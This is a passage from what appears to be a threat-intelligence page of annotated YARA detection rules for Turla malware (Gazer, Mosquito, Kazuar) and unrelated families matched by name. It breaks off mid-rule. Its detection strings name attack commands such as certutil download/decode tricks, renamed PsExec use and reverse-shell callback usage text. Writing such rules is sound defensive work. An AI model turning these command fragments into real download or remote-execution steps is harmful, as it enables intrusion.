YARA rules for Turla
YARA rules whose family, name, or description textually matches this actor or its tooling. Because the match is lexical, rules that have nothing to do with Turla can be pulled in by a shared substring — the EQGRP/ShadowBrokers "epic*" tools, the Rombertik/CarbonGrabber set and the generic certutil rules below appear to be such cases — so check each rule's meta.reference before attributing a hit to Turla. Rules that use the pe module (imphash, signatures, version_info) need `import "pe"` at the top of the ruleset, which this listing does not show, and APT_Cloaked_CERTUTIL additionally needs the external variables `filename` and `filepath` defined at scan time. Use these for binary-pattern hunts.
// Batch wrapper that drives a renamed PsExec ("ps.exe -accepteula") against a
// host list — from the 2018 NCSC alert on hostile-state compromise of UK
// engineering / ICS organisations. There is no file-type anchor and no size
// cap: any file carrying 3 of the 5 plain-ascii fragments below matches.
rule Batch_Script_To_Run_PsExec {
meta:
author = "NCSC"
description = "Detects malicious batch file from NCSC report"
reference = "https://www.ncsc.gov.uk/alerts/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control"
date = "2018/04/06"
hash = "b7d7c4bc8f9fd0e461425747122a431f93062358ed36ce281147998575ee1a18"
id = "1fbeeec8-a5bd-569e-b435-c7d82d32e47b"
strings:
// Anonymous strings ($ = ...) can only be counted ("N of them"), not
// referenced individually in the condition.
$ = "Tokens=1 delims=" ascii            // looks like a `for /f` loop header — generic batch syntax
$ = "SET ws=%1" ascii                   // workstation name taken from the first argument
$ = "Checking %ws%" ascii
$ = "%TEMP%\\%ws%ns.txt" ascii          // per-host output file in %TEMP%
$ = "ps.exe -accepteula" ascii          // PsExec EULA flag behind a renamed binary
condition:
3 of them   // 3 of 5; the first fragment alone is common in benign batch files
}
// Equation Group (EQGRP) firewall-toolset script epicbanana_2.1.0.1.py from the
// 2016 ShadowBrokers material. This is NOT Turla tooling; it presumably lands on
// this page because "epic" also names a Turla campaign. Matches the Python
// source itself (operator-facing error text), not a compiled payload.
rule EQGRP_epicbanana_2_1_0_1 {
meta:
description = "EQGRP Toolset Firewall - file epicbanana_2.1.0.1.py"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Research"
date = "2016-08-16"
hash1 = "4b13cc183c3aaa8af43ef3721e254b54296c8089a0cd545ee3b867419bb66f61"
id = "cc3346bd-0347-5cf3-b946-5c017d68d93e"
strings:
$s1 = "failed to create version-specific payload" fullword ascii
$s2 = "(are you sure you did \"make [version]\" in versions?)" fullword ascii
condition:
1 of them   // either message alone fires; no size cap, no file-type anchor
}
// ShadowBrokers leak: the operator notes file user.tool.epichero.COMMON. Not
// Turla tooling (presumably listed here via the "epic" substring). The strings
// are usage text with placeholder tokens (TARGET_IP, *_CALLBACK_PORT), so this
// matches the documentation, not a binary implant.
rule FVEY_ShadowBroker_user_tool_epichero {
meta:
description = "Auto-generated rule - file user.tool.epichero.COMMON"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
date = "2016-12-17"
hash1 = "679d194c32cbaead7281df9afd17bca536ee9d28df917b422083ae8ed5b5c484"
id = "b1ca04e5-bac7-5247-b2d4-82c3515c92fc"
strings:
$x2 = "-irtun TARGET_IP ISH_CALLBACK_PORT"                      // no modifiers: ascii, not fullword
$x3 = "-O REVERSE_SHELL_CALLBACK_PORT -w HIDDEN_DIR" fullword ascii
condition:
1 of them   // either usage line suffices; no size cap
}
// Empire's ReflectivePick_x64_orig.dll — the reflective DLL that hosts a
// PowerShell runner. Anchored on the MZ header and a 400 KB cap; needs one of
// the PowerShellRunner artefacts plus the literal "ReflectivePick" string.
rule Empire_ReflectivePick_x64_orig {
meta:
description = "Detects Empire component - file ReflectivePick_x64_orig.dll"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/adaptivethreat/Empire"
date = "2016-11-05"
modified = "2022-12-21"
hash1 = "a8c1b108a67e7fc09f81bd160c3bafb526caf3dbbaf008efb9a96f4151756ff2"
id = "cd69a149-d881-5f93-9647-84241bd96ba5"
strings:
$a1 = "\\PowerShellRunner.pdb" ascii        // PDB path fragment (trivially stripped by a rebuild)
$a2 = "PowerShellRunner.dll" fullword wide
$s1 = "ReflectivePick" fullword ascii
condition:
// uint16 is little-endian: 0x5a4d == bytes "MZ"
uint16(0) == 0x5a4d and filesize < 400KB and 1 of ($a*) and $s1
}
// Casper (French-attributed espionage malware) — this rule targets the
// reconnaissance REPORT the implant writes, not the implant binary: there is
// no MZ anchor and no size cap, and the strings are the report's section
// headers. All seven must be present. Not Turla tooling.
rule Casper_SystemInformation_Output {
meta:
description = "Casper French Espionage Malware - System Info Output - http://goo.gl/VRJNLo"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "http://goo.gl/VRJNLo"
date = "2015/03/06"
score = 70
id = "aaae200c-7ef1-52eb-be5b-36e0ad29ecef"
strings:
// No modifiers on any string: ascii only, a UTF-16 report would not match.
$a0 = "***** SYSTEM INFORMATION ******"
$a1 = "***** SECURITY INFORMATION ******"
$a2 = "Antivirus: "
$a3 = "Firewall: "
$a4 = "***** EXECUTION CONTEXT ******"
$a5 = "Identity: "
$a6 = "<CONFIG TIMESTAMP="
condition:
all of them
}
// netstat.exe from a Chinese hacktool collection (tools.zjqhr.com). Not Turla
// tooling. Three of the four strings are flagged as goodware strings (they
// occur in legitimate netstat builds), so the discriminating element is
// "w03a2409.dll" — review hits on that basis. The hash is SHA-1 (40 hex chars).
rule Dos_netstat {
meta:
description = "Chinese Hacktool Set - file netstat.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "http://tools.zjqhr.com/"
date = "2015-06-13"
hash = "d0444b7bd936b5fc490b865a604e97c22d97e598"
id = "bc3141bf-4e82-5aa4-a8a6-a0a4586ee9a1"
strings:
$s0 = "w03a2409.dll" fullword ascii
$s1 = "Retransmission Timeout Algorithm = unknown (%1!u!)" fullword wide /* Goodware String - occured 2 times */
$s2 = "Administrative Status = %1!u!" fullword wide /* Goodware String - occured 2 times */
$s3 = "Packet Too Big %1!-10u! %2!-10u!" fullword wide /* Goodware String - occured 2 times */
condition:
uint16(0) == 0x5a4d and filesize < 150KB and all of them   // MZ anchor + all four
}
// Generic certutil living-off-the-land detection: base64 decode of a dropped
// payload, or the -urlcache download trick. Low score (40) — this fires on
// scripts, documents and logs that merely contain the command line, so it is a
// triage signal rather than a verdict. Not specific to Turla.
rule Certutil_Decode_OR_Download {
meta:
description = "Certutil Decode"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Internal Research"
score = 40
date = "2017-08-29"
modified = "2026-04-01"
id = "63bdefd2-225a-56d5-b615-5e236c97f050"
strings:
// NOTE(review): $a1/$a2 and $a3/$a4 are byte-identical as shown here. The
// duplicates are almost certainly spelling variants (e.g. extra whitespace
// between command and switch) that were collapsed when this page was
// rendered — confirm against the upstream signature-base copy before use.
$a1 = "certutil -decode " ascii wide
$a2 = "certutil -decode " ascii wide
$a3 = "certutil.exe -decode " ascii wide
$a4 = "certutil.exe -decode " ascii wide
$a5 = "certutil -urlcache -split -f http" ascii wide
$a6 = "certutil.exe -urlcache -split -f http" ascii wide
// False-positive guards: $fp_msi is UTF-16LE "Root Entry" (the root storage
// name found in OLE compound / MSI files); $fp_doc excludes AWS documentation.
$fp_msi = { 52 00 6F 00 6F 00 74 00 20 00 45 00 6E 00 74 00 72 00 79 }
$fp_doc = "https://docs.aws.amazon.com" ascii
condition:
filesize < 700KB
and 1 of ($a*)
and not 1 of ($fp*)   // any single FP marker suppresses the whole rule
}
// Renamed certutil.exe (masquerading): the binary still carries certutil's own
// strings, but the on-disk name does not contain "certutil".
// Requires the external variables `filename` and `filepath` (e.g. `yara -d
// filename=... -d filepath=...`, or a scanner that defines them); without them
// the rule does not compile. No filesize cap.
rule APT_Cloaked_CERTUTIL {
meta:
description = "Detects a renamed certutil.exe utility that is often used to decode encoded payloads"
author = "Florian Roth (Nextron Systems)"
reference = "Internal Research"
date = "2018-09-14"
modified = "2022-06-27"
id = "13943cda-6bb1-5c6c-8e55-e8d4bba1ffef"
strings:
$s1 = "-------- CERT_CHAIN_CONTEXT --------" fullword ascii
$s5 = "certutil.pdb" fullword ascii     // PDB name survives a simple rename
$s3 = "Password Token" fullword ascii
condition:
uint16(0) == 0x5a4d and all of them
// `contains` is case-sensitive, hence the three spellings; other casings
// (e.g. "CERTUTIL.EXE") are not excluded and will therefore match.
and not filename contains "certutil"
and not filename contains "CertUtil"
and not filename contains "Certutil"
and not filepath contains "\\Bromium\\"   // known benign copy location
}
// Script that writes a payload wrapped in PEM certificate markers and then
// decodes it with certutil — the "fake certificate" drop trick. All three
// fragments are required and the file must be under 10 KB, so this is aimed at
// small dropper scripts, not at the decoded binary. Not specific to Turla.
rule Binary_Drop_Certutil {
meta:
description = "Drop binary as base64 encoded cert trick"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://goo.gl/9DNn8q"
date = "2015-07-15"
score = 70
id = "19791e51-d041-524d-80fa-9f3ec54eb084"
strings:
$s0 = "echo -----BEGIN CERTIFICATE----- >" ascii    // creates/overwrites the carrier file
$s1 = "echo -----END CERTIFICATE----- >>" ascii     // appends the closing marker
$s2 = "certutil -decode " ascii
condition:
filesize < 10KB and all of them
}
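// Gazer (Turla second-stage backdoor, ESET 2017): flags PE files whose
// Authenticode signer subject contains one of two names ESET observed on the
// samples. Requires `import "pe"`. Only the subject STRING is compared — the
// signature is not validated — so a self-signed certificate with the same
// subject also matches, and a re-signed sample does not.
// NOTE(review): the `id` below is identical to the one on Gazer_certificate;
// rule ids are meant to be unique per rule.
rule Gazer_certificate_subject {
meta:
description = "Detects Turla's Gazer malware"   // typo "Tura's" corrected
author = "ESET"
reference = "https://www.welivesecurity.com/2017/08/30/eset-research-cyberespionage-gazer/"
date = "30.08.2017"
id = "4eace653-003e-5cae-9db8-f26502f35fc4"
condition:
// For non-PE input pe.number_of_signatures is undefined, which evaluates the
// whole expression to false, so no separate MZ check is needed.
for any i in (0..pe.number_of_signatures - 1):
(
pe.signatures[i].subject contains "Solid Loop" or
pe.signatures[i].subject contains "Ultimate Computer Support"
)
}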
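// Gazer (Turla, ESET 2017): matches two 16-byte sequences anywhere in a PE
// under 2 MB. Given the rule name these are presumably the serial numbers (or
// another fixed field) of the signing certificates — confirm against the
// reference before relying on that interpretation. Unlike
// Gazer_certificate_subject this needs no pe module, but it also fires on any
// file that merely embeds the same bytes (e.g. a certificate store dump).
// NOTE(review): the `id` below duplicates Gazer_certificate_subject's id.
rule Gazer_certificate {
meta:
description = "Detects Turla's Gazer malware"   // typo "Tura's" corrected
author = "ESET"
reference = "https://www.welivesecurity.com/2017/08/30/eset-research-cyberespionage-gazer/"
date = "30.08.2017"
id = "4eace653-003e-5cae-9db8-f26502f35fc4"
strings:
$certif1 = { 52 76 a4 53 cd 70 9c 18 da 65 15 7e 5f 1f de 02 }
$certif2 = { 12 90 f2 41 d9 b2 80 af 77 fc da 12 c6 b4 96 9c }
condition:
uint16(0) == 0x5a4d and 1 of them and filesize < 2MB   // MZ anchor, either sequence
}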
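// Gazer (Turla, ESET 2017): three hard-coded temp-file names used by the
// backdoor. The strings carry no modifiers, so they are matched as ascii only —
// a UTF-16 copy of the same name (e.g. in a resource or a wide-string table)
// would not match. Any one name in an MZ file fires; there is no size cap.
rule Gazer_logfile_name {
meta:
description = "Detects Turla's Gazer malware"   // typo "Tura's" corrected
author = "ESET"
reference = "https://www.welivesecurity.com/2017/08/30/eset-research-cyberespionage-gazer/"
date = "30.08.2017"
id = "c10d440f-dc9e-54c8-b329-9f22cba05e86"
strings:
$s1 = "CVRG72B5.tmp.cvr"
$s2 = "CVRG1A6B.tmp.cvr"
$s3 = "CVRG38D9.tmp.cvr"
condition:
uint16(0) == 0x5a4d and 1 of them
}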
// Turla "Mosquito" (ESET, Jan 2018): sample 1. Requires `import "pe"`.
// Two ways to match: the sample's import hash, or both odd short strings.
// The imphash is brittle — any change to the import table (rebuild,
// different linker order) produces a different value — so the string branch
// is the one that generalises, and it needs BOTH strings.
rule TurlaMosquito_Mal_1 {
meta:
description = "Detects malware sample from Turla Mosquito report"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf"
date = "2018-02-22"
hash1 = "b295032919143f5b6b3c87ad22bcf8b55ecc9244aa9f6f88fc28f36f5aa2925e"
id = "1395509a-72f5-56c0-895c-3e9f15829de1"
strings:
$s1 = "Pipetp" fullword ascii
$s2 = "EStOpnabn" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 2000KB and (
pe.imphash() == "169d4237c79549303cca870592278f42" or
all of them
)
}
// Turla "Mosquito" (ESET, Jan 2018): sample 2 (two hashes). Requires
// `import "pe"`. Matches on the sample's imphash, or on all four strings:
// an MSVC RTTI type-descriptor name, a wide literal, and two six-letter
// tokens that read as x86 single-byte `push r32` opcodes (0x50–0x57) when
// taken as code bytes — presumably a prologue pattern expressed as text.
rule TurlaMosquito_Mal_2 {
meta:
description = "Detects malware sample from Turla Mosquito report"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf"
date = "2018-02-22"
hash1 = "68c6e9dea81f082601ae5afc41870cea3f71b22bfc19bcfbc61d84786e481cb4"
hash2 = "05254971fe3e1ca448844f8cfcfb2b0de27e48abd45ea2a3df897074a419a3f4"
id = "d23d9fe1-26e3-5012-8a88-61ebbc3fbd8f"
strings:
$s1 = ".?AVFileNameParseException@ExecuteFile@@" fullword ascii   // RTTI name: class ExecuteFile::FileNameParseException
$s3 = "no_address" fullword wide
$s6 = "SRRRQP" fullword ascii   // fullword: must not be bordered by alphanumerics
$s7 = "QWVPQQ" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 600KB and (
pe.imphash() == "cd918073f209c5da7a16b6c125d73746" or
all of them
)
}
// Turla "Mosquito" (ESET, Jan 2018): sample 3, the component exporting
// InstallRoutineW / StartRoutine. Requires `import "pe"`. Four independent
// triggers: imphash, the export pair, the internal DLL name, or any 3 of the
// 5 strings (note `them` includes $x1, so $x1 plus two $s strings also counts).
rule TurlaMosquito_Mal_3 {
meta:
description = "Detects malware sample from Turla Mosquito report"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf"
date = "2018-02-22"
hash1 = "443cd03b37fca8a5df1bbaa6320649b441ca50d1c1fcc4f5a7b94b95040c73d1"
id = "c83e0a93-3f8d-572d-ac1a-92fef0b3d3f6"
strings:
$x1 = "InstructionerDLL.dll" fullword ascii   // internal/original DLL name — sufficient on its own
$s1 = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" fullword wide   // hard-coded C2 user agent (Chrome 41)
$s2 = "/scripts/m/query.php?id=" fullword wide   // C2 URI path
$s3 = "SELECT * FROM AntiVirusProduct" fullword ascii   // WMI query, presumably against root\SecurityCenter2 — AV enumeration
$s4 = "Microsoft Update" fullword wide
condition:
uint16(0) == 0x5a4d and filesize < 400KB and (
pe.imphash() == "88488fe0b8bcd6e379dea6433bb5d7d8" or
( pe.exports("InstallRoutineW") and pe.exports("StartRoutine") ) or
$x1 or
3 of them
)
}
// Turla "Mosquito" (ESET, Jan 2018): sample 4. Requires `import "pe"`.
// Imphash-only rule — it identifies this exact build's import table and
// nothing else, so expect it to miss recompiled variants and to be useful
// mainly for retro-hunting the known hash.
rule TurlaMosquito_Mal_4 {
meta:
description = "Detects malware sample from Turla Mosquito report"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf"
date = "2018-02-22"
hash1 = "b362b235539b762734a1833c7e6c366c1b46474f05dc17b3a631b3bff95a5eec"
id = "1d5c32b3-0316-525c-9386-222917144251"
condition:
uint16(0) == 0x5a4d and filesize < 800KB and pe.imphash() == "17b328245e2874a76c2f46f9a92c3bad"
}
// Turla "Mosquito" (ESET, Jan 2018): sample 5. Requires `import "pe"`.
// Imphash-only, like Mal_4: matches this build's import table exactly and
// will not generalise to relinked variants.
rule TurlaMosquito_Mal_5 {
meta:
description = "Detects malware sample from Turla Mosquito report"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf"
date = "2018-02-22"
hash1 = "26a1a42bc74e14887616f9d6048c17b1b4231466716a6426e7162426e1a08030"
id = "9f3a35c9-b0f0-5ca6-8b34-19e2d45305f2"
condition:
uint16(0) == 0x5a4d and filesize < 300KB and pe.imphash() == "ac40cf7479f53a4754ac6481a4f24e57"
}
// Turla "Mosquito" (ESET, Jan 2018): sample 6. Pure string rule (no pe
// module). The $a strings are the C2 artefacts shared with Mal_3 (same URI
// path and user agent); the $s strings are the same kind of push-opcode
// text tokens seen in Mal_2. Two $a strings suffice, otherwise 4 of all 6.
rule TurlaMosquito_Mal_6 {
meta:
description = "Detects malware sample from Turla Mosquito report"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf"
date = "2018-02-22"
hash1 = "b79cdf929d4a340bdd5f29b3aeccd3c65e39540d4529b64e50ebeacd9cdee5e9"
id = "1c320b60-ec7a-5f87-b871-f55924351f8f"
strings:
$a1 = "/scripts/m/query.php?id=" fullword wide   // C2 URI path
$a2 = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" fullword wide   // hard-coded user agent
$a3 = "GetUserNameW fails" fullword wide   // error string from user enumeration
$s1 = "QVSWQQ" fullword ascii
$s2 = "SRRRQP" fullword ascii   // also used by TurlaMosquito_Mal_2
$s3 = "QSVVQQ" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 500KB and (
2 of ($a*) or
4 of them
)
}
// Turla "Mosquito" follow-up (Oct 2022, three hashes). Requires `import "pe"`.
// Either the imphash, or ALL of the seven strings/opcode sequences — the
// string branch is therefore very strict and unlikely to fire on variants.
rule APT_TurlaMosquito_MAL_Oct22_1 {
meta:
description = "Detects Turla Mosquito malware"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf"
date = "2022-10-25"
score = 80
hash1 = "6b9e48e3f4873cfb95639d9944fe60e3b056daaa2ea914add14c982e3e11128b"
hash2 = "b868b674476418bbdffbe0f3d617d1cce4c2b9dae0eaf3414e538376523e8405"
hash3 = "e7fd14ca45818044690ca67f201cc8cfb916ccc941a105927fc4c932c72b425d"
id = "f5ad0c0f-81ca-5157-aefb-ead049ada30d"
strings:
$s1 = "Logger32.dll" ascii fullword
// NOTE(review): $s4 reads like several message fragments run together
// ("...on drive %" / "martCommand : CWin32ApiErrorExce"); it may be a
// deliberately truncated wide string or a rendering artefact — verify the
// exact bytes against hash1..3 before editing.
$s4 = " executing %u command on drive %martCommand : CWin32ApiErrorExce" wide
$s5 = "Unsupported drive!!!" ascii fullword
$s7 = "D:\\Build_SVN\\PC_MAGICIAN_4." ascii fullword   // build-path fragment (PDB-style)
// Raw code-byte sequences; no wildcards, so they are tied to this exact build.
$op1 = { 40 cc 8b 8b 06 cc 55 00 70 8b 10 10 33 51 04 46 04 64 }
$op2 = { c3 10 e8 50 04 00 cc ff 8d 00 69 8d 75 ff 68 ec 6a 4d }
$op3 = { e8 64 a1 6e 00 64 a1 c2 04 08 75 40 73 1d 8b ff cc 10 89 cc 8b c3 cc af }
condition:
uint16(0) == 0x5a4d and
filesize < 2000KB and
(
pe.imphash() == "073235ae6dfbb1bf5db68a039a7b7726" or
all of them
)
}
// Turla Kazuar masquerading as Sysinternals DebugView (JAG-S, "SysinTurla").
// Requires `import "pe"`. Pure VERSIONINFO rule: LegalCopyright must be the
// placeholder "Test Copyright" AND one of four key combinations must hold.
// Version-resource lookups are exact, case-sensitive key names; a key that is
// absent is undefined and makes that branch false.
// NOTE(review): "Description" and "OriginalName" are not standard VERSIONINFO
// keys (the standard ones are "FileDescription" and "OriginalFilename").
// Either the samples genuinely carry these non-standard keys — which would
// itself be a strong tell — or those two branches can never fire. Check
// hash1/hash2 before relying on them.
rule apt_RU_Turla_Kazuar_DebugView_peFeatures
{
meta:
description = "Turla mimicking SysInternals Tools- peFeatures"
reference = "https://www.epicturla.com/blog/sysinturla"
version = "2.0"
author = "JAG-S"
score = 85
hash1 = "1749c96cc1a4beb9ad4d6e037e40902fac31042fa40152f1d3794f49ed1a2b5c"
hash2 = "44cc7f6c2b664f15b499c7d07c78c110861d2cc82787ddaad28a5af8efc3daac"
id = "0a1675c0-8645-5288-9ef6-e68ffbfe0c3b"
condition:
uint16(0) == 0x5a4d
and
(
// Placeholder copyright string — a real Sysinternals build would not ship this.
pe.version_info["LegalCopyright"] == "Test Copyright"
and
(
(
pe.version_info["ProductName"] == "Sysinternals DebugView"
and
pe.version_info["Description"] == "Sysinternals DebugView"   // non-standard key, see note above
)
or
(
pe.version_info["FileVersion"] == "4.80.0.0"   // same version string APT_MAL_RU_Turla_Kazuar_May20_1 matches as bytes
and
pe.version_info["Comments"] == "Sysinternals DebugView"
)
or
(
pe.version_info["OriginalName"] contains "DebugView.exe"   // non-standard key, see note above
and
pe.version_info["InternalName"] contains "DebugView.exe"
)
or
(
pe.version_info["OriginalName"] == "Agent.exe"   // non-standard key, see note above
and
pe.version_info["InternalName"] == "Agent.exe"
)
)
)
}
// Turla Kazuar, May 2020 (four hashes; the SysinTurla DebugView lookalikes).
// No pe module needed. All three must be present: the vendor name, the
// placeholder copyright, and a raw version-resource fragment — the bytes
// 34 2e 38 30 2e 30 2e 30 in $op1 are ascii "4.80.0.0", i.e. the same
// FileVersion the peFeatures rule above checks through the pe module.
rule APT_MAL_RU_Turla_Kazuar_May20_1 {
meta:
description = "Detects Turla Kazuar malware"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.epicturla.com/blog/sysinturla"
date = "2020-05-28"
hash1 = "1749c96cc1a4beb9ad4d6e037e40902fac31042fa40152f1d3794f49ed1a2b5c"
hash2 = "1fca5f41211c800830c5f5c3e355d31a05e4c702401a61f11e25387e25eeb7fa"
hash3 = "2d8151dabf891cf743e67c6f9765ee79884d024b10d265119873b0967a09b20f"
hash4 = "44cc7f6c2b664f15b499c7d07c78c110861d2cc82787ddaad28a5af8efc3daac"
id = "cd0d1fa2-5303-55f8-90a7-4a699ec79230"
strings:
$s1 = "Sysinternals" ascii fullword   // also present in genuine Sysinternals tools — not discriminating alone
$s2 = "Test Copyright" wide fullword  // placeholder copyright, the real tell
$op1 = { 0d 01 00 08 34 2e 38 30 2e 30 2e 30 00 00 13 01 }   // "...4.80.0.0..." as raw bytes
condition:
uint16(0) == 0x5a4d and
filesize < 2000KB and
all of them
}
// Turla Kazuar RAT component reported by @DrunkBinary (Apr 2018). Requires
// `import "pe"`. Targets a very small PE (< 20 KB): either the imphash or any
// two of the four strings. Note that `2 of them` counts $x1 like the others —
// the x/s prefixes carry no weight in the condition.
rule Turla_KazuarRAT {
meta:
description = "Detects Turla Kazuar RAT described by DrunkBinary"
author = "Markus Neis / Florian Roth"
reference = "https://twitter.com/DrunkBinary/status/982969891975319553"
date = "2018-04-08"
hash1 = "6b5d9fca6f49a044fd94c816e258bf50b1e90305d7dab2e0480349e80ed2a0fa"
hash2 = "7594fab1aadc4fb08fb9dbb27c418e8bc7f08dadb2acf5533dc8560241ecfc1d"
hash3 = "4e5a86e33e53931afe25a8cb108f53f9c7e6c6a731b0ef4f72ce638d0ea5c198"
id = "147cc7b7-6dbd-51a2-9501-bcbaec32e20e"
strings:
$x1 = "~1.EXE" wide                 // looks like an 8.3 short-name suffix; not fullword, so it matches inside longer paths
$s2 = "dl32.dll" fullword ascii
$s3 = "HookProc@" ascii              // partial (decorated?) symbol name — not fullword
$s4 = "0`.wtf" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 20KB and (
pe.imphash() == "682156c4380c216ff8cb766a2f2e8817" or
2 of them )
}
// Rombertik / CarbonGrabber form-grabber (Talos, May 2015). Not Turla tooling —
// presumably on this page because "Carbon" is also a Turla backdoor name.
// The four truncated tokens are matched `fullword`, so "malware", "sample",
// "virus" and "sandbox" do NOT satisfy them; only the bare stems as standalone
// strings do. All six strings are required (MZ, < 5 MB).
rule Rombertik_CarbonGrabber {
meta:
description = "Detects CarbonGrabber alias Rombertik - file Copy#064046.scr"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "http://blogs.cisco.com/security/talos/rombertik"
date = "2015-05-05"
hash1 = "2f9b26b90311e62662c5946a1ac600d2996d3758"   // SHA-1 hashes
hash2 = "aeb94064af2a6107a14fd32f39cb502e704cd0ab"
hash3 = "c2005c8d1a79da5e02e6a15d00151018658c264c"
hash4 = "98223d4ec272d3a631498b621618d875dd32161d"
id = "b3aee336-9f3b-5fae-928d-8357408a7b69"
strings:
$x1 = "ZwGetWriteWatch" fullword ascii      // imported API name
$x2 = "OutputDebugStringA" fullword ascii   // imported API name
$x3 = "malwar" fullword ascii               // stems presumably compared against the username/hostname for sandbox evasion — see reference
$x4 = "sampl" fullword ascii
$x5 = "viru" fullword ascii
$x6 = "sandb" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 5MB and all of them
}
// CarbonGrabber / Rombertik C2 panel installer (install.php): the PHP source
// that creates the `logs` table. Matches source code, not a binary; all eight
// fragments are required and the file must be under 3 KB. Not Turla tooling.
// NOTE(review): this `id` is also used by Rombertik_CarbonGrabber_Panel;
// rule ids should be unique.
rule Rombertik_CarbonGrabber_Panel_InstallScript {
meta:
description = "Detects CarbonGrabber alias Rombertik panel install script - file install.php"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "http://blogs.cisco.com/security/talos/rombertik"
date = "2015-05-05"
hash = "cd6c152dd1e0689e0bede30a8bd07fef465fbcfa"   // SHA-1
id = "f6c04e27-bbab-5012-a4f9-71d49d252b83"
strings:
$s0 = "$insert = \"INSERT INTO `logs` (`id`, `ip`, `name`, `host`, `post`, `time`, `bro" ascii   // truncated on purpose; not fullword
$s3 = "`post` text NOT NULL," fullword ascii
$s4 = "`host` text NOT NULL," fullword ascii
$s5 = ") ENGINE=InnoDB DEFAULT CHARSET=latin1 AUTO_INCREMENT=5 ;\" ;" fullword ascii
$s6 = "$db->exec($columns); //or die(print_r($db->errorInfo(), true));;" fullword ascii
$s9 = "$db->exec($insert);" fullword ascii
$s10 = "`browser` text NOT NULL," fullword ascii
$s13 = "`ip` text NOT NULL," fullword ascii
condition:
filesize < 3KB and all of them
}
// CarbonGrabber / Rombertik C2 panel (index.php). Matches the PHP source:
// login redirects, the log-insert statement, a plain-text username/password
// comparison ($s16) and a "TRUNCATE TABLE `logs`" admin action. All six
// fragments required, file under 46 KB. Not Turla tooling.
// NOTE(review): this `id` duplicates Rombertik_CarbonGrabber_Panel_InstallScript's.
rule Rombertik_CarbonGrabber_Panel {
meta:
description = "Detects CarbonGrabber alias Rombertik Panel - file index.php"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "http://blogs.cisco.com/security/talos/rombertik"
date = "2015-05-05"
hash = "e6e9e4fc3772ff33bbeeda51f217e9149db60082"   // SHA-1
id = "f6c04e27-bbab-5012-a4f9-71d49d252b83"
strings:
$s0 = "echo '<meta http-equiv=\"refresh\" content=\"0;url=index.php?a=login\">';" fullword ascii
$s1 = "echo '<meta http-equiv=\"refresh\" content=\"2;url='.$website.'/index.php?a=login" ascii   // truncated; not fullword
$s2 = "header(\"location: $website/index.php?a=login\");" fullword ascii
$s3 = "$insertLogSQL -> execute(array(':id' => NULL, ':ip' => $ip, ':name' => $name, ':" ascii   // truncated; not fullword
$s16 = "if($_POST['username'] == $username && $_POST['password'] == $password){" fullword ascii
$s17 = "$SQL = $db -> prepare(\"TRUNCATE TABLE `logs`\");" fullword ascii
condition:
filesize < 46KB and all of them
}
// CarbonGrabber / Rombertik builder (Builder.exe): the operator tool that
// stamps host/path into the stub. Keyed on the developer's project path and
// the builder's interactive prompts; all five strings required (MZ, < 35 KB).
// Not Turla tooling.
rule Rombertik_CarbonGrabber_Builder {
meta:
description = "Detects CarbonGrabber alias Rombertik Builder - file Builder.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "http://blogs.cisco.com/security/talos/rombertik"
date = "2015-05-05"
